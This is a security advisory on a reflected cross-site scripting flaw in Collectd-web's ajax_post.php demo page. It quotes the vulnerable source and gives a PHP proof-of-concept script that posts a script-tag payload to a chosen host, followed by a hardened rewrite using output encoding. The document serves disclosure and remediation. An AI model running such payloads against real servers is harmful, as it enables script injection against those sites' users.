Collectd-web XSS Vulnerability

2016.05.23
Credit: MehrdadLinux
Risk: Low
Local: No
Remote: Yes
CVE: N/A
CWE: CWE-79

Title - Collectd-web XSS

# Exploit Title : XSS Vulnerability in Collectd-web
# Date: Sun May 22 11:55:36 EDT 2016
# Reported Date : Sun May 22 11:55:36 EDT 2016
# Vendor Homepage: https://collectd.org/wiki/index.php/Collectd-web
# Version: 0.4.0
# Software Link: https://github.com/httpdss/collectd-web
# Solution : https://github.com/httpdss/collectd-web/issues/77
# Exploit Author : MehrdadLinux
# Tested On : Linux Platforms.
# Facebook : https://facebook.com/MehrdadLinux
# Twitter : http://twitter.com/MehrdadLinux
# Detailed Vul: http://blog.opsnit.com

===========================================================================================

1. VULNERABILITY
-------------------------

XSS vulnerability in Collectd-web 0.4.0 – January 2016

2. BACKGROUND
-------------------------

Collectd-web is a web-based front-end for RRD data collected by collectd. It is based on contrib/collection.cgi, a demo CGI script included in collectd. With a strong emphasis on jQuery and jQueryUI, Collectd-web gives sysadmins a nice yet functional interface.

3. DESCRIPTION
-------------------------

XSS in ajax_post.php
https://github.com/httpdss/collectd-web/blob/master/media/jqtouch/demos/main/ajax_post.php

(line numbers kept because the text below refers to them)

     1  <?php
     2  $theaters = array("Los Gatos Cinema","Cinelux Plaza Theatre","Camera 7");
     3  $movies = array("Transformers","Knocked Up","Live Free Die Hard");
     4  $title = "-";
     5  if ($_POST["zip"]) {
     6      $title = "Zip " . $_POST['zip'];
     7  } else {
     8      $title = $_POST['movie'];
     9  }
    10  ?>
    11  <div>
    12      <div class="toolbar">
    13          <h1><?php echo $title ?></h1>
    14          <a href="#" class="button back">Back</a>
    15      </div>
    16      <ul class="edgetoedge">
    17      <?php
    18      if ($_POST['zip']) {
    19          foreach ($theaters as $theater) {
    20              echo '<li><a href="#theater">' . $theater . '</a></li>';
    21          }
    22      } else {
    23          foreach ($movies as $movie) {
    24              echo '<li><a href="#movie">' . $movie . '</a></li>';
    25          }
    26      }
    27      ?>
    28      </ul>
    29      <form action="ajax_post.php" method="POST">
    30          <ul class="rounded">
    31              <li><input type="text" name="zip" value="" placeholder="Live post event test" /></li>
    32          </ul>
    33          <a style="margin:0 10px;color:rgba(0,0,0,.9)" href="#" class="submit whiteButton">Submit</a>
    34
    35      </form>
    36  </div>

The vulnerability is at line 5: the zip POST parameter is accepted without sanitisation and, via $title, is echoed straight into the page.

====================================Exploit=========================================

<?php
// Target host is taken from the first command-line argument.
$yourtarget = $argv[1];
$ch = curl_init();
curl_setopt($ch, CURLOPT_URL, "http://$yourtarget/collectd-web/media/jqtouch/demos/main/ajax_post.php");
curl_setopt($ch, CURLOPT_USERAGENT, "Mozilla/4.0 (compatible; MSIE 5.01; Windows NT 5.0)");
curl_setopt($ch, CURLOPT_POST, 1);
// Payload is sent in the "movie" field; the inner double quotes are escaped so the PHP string parses.
curl_setopt($ch, CURLOPT_POSTFIELDS, "movie=></SCRIPT>\">'><SCRIPT>alert(String.fromCharCode(77,101,104,114,100,97,100,76,105,110,117,120,32,88,83,83))</SCRIPT>");
$buf = curl_exec($ch);
curl_close($ch);
unset($ch);
// Print the reflected response body.
echo $buf;
?>

====================================Exploit=========================================

4. DISCOVERED BY
-------------------------

The vulnerability has been discovered by Mehrdad Abbasi (MehrdadLinux) and Hossein Masoudi (cs.masoudi)
email : MehrdadLinux (at) gmail (dot) com
http://opsnit.com

5. LEGAL NOTICES
-------------------------

The information contained within this advisory is supplied "as-is" with no warranties or guarantees of fitness of use or otherwise. I accept no responsibility for any damage caused by the use or misuse of this information.
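As an added example that is not part of the advisory or of the collectd-web project, the following PHP rewrites the ajax_post.php logic described above with output encoding on every request-controlled value, which is the CWE-79 fix for the line-5 / line-13 path. The helper names esc() and render_ajax_post() and the shortened payload in the self-check are assumptions constructed for this example.

```php
<?php
// Added example, not collectd-web's code: hardened version of the ajax_post.php logic.
// Every value that originates from the request passes through esc() before it is
// written into the HTML, so the browser renders it as text rather than markup.

// Encode for an HTML text or attribute context. ENT_QUOTES also encodes the single
// quote, which the advisory's payload (">'>) uses to break out of attributes.
function esc(string $s): string {
    return htmlspecialchars($s, ENT_QUOTES | ENT_SUBSTITUTE, 'UTF-8');
}

// Build the response body from an associative array of POST fields.
// Kept as a pure function so it can be exercised without a web server.
function render_ajax_post(array $post): string {
    $theaters = array("Los Gatos Cinema", "Cinelux Plaza Theatre", "Camera 7");
    $movies   = array("Transformers", "Knocked Up", "Live Free Die Hard");

    // isset() instead of a bare truth test so missing keys and "0" behave predictably.
    $zip   = (isset($post['zip']) && $post['zip'] !== '') ? (string)$post['zip'] : null;
    $movie = isset($post['movie']) ? (string)$post['movie'] : '-';
    $title = ($zip !== null) ? "Zip " . $zip : $movie;

    $items = ($zip !== null) ? $theaters : $movies;
    $href  = ($zip !== null) ? '#theater' : '#movie';

    $html  = '<div><div class="toolbar"><h1>' . esc($title) . '</h1>';
    $html .= '<a href="#" class="button back">Back</a></div><ul class="edgetoedge">';
    foreach ($items as $item) {
        // $item is static data here, but encoding it costs nothing and stays correct
        // if the arrays are ever populated from user input.
        $html .= '<li><a href="' . $href . '">' . esc($item) . '</a></li>';
    }
    $html .= '</ul></div>';
    return $html;
}

// Self-check with a constructed payload in the shape of the advisory's one.
$payload = '></SCRIPT>">\'><SCRIPT>alert(1)</SCRIPT>';
$out = render_ajax_post(array('movie' => $payload));
// No raw "<SCRIPT" tag survives in the output; the angle brackets are now entities.
assert(strpos($out, '<SCRIPT') === false);
assert(strpos($out, '&lt;SCRIPT&gt;') !== false);
echo $out, PHP_EOL;
```

Run with `php hardened_ajax_post.php`; the printed <h1> contains the payload only as `&gt;&lt;/SCRIPT&gt;&quot;&gt;&#039;&gt;&lt;SCRIPT&gt;...`, so no script executes.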

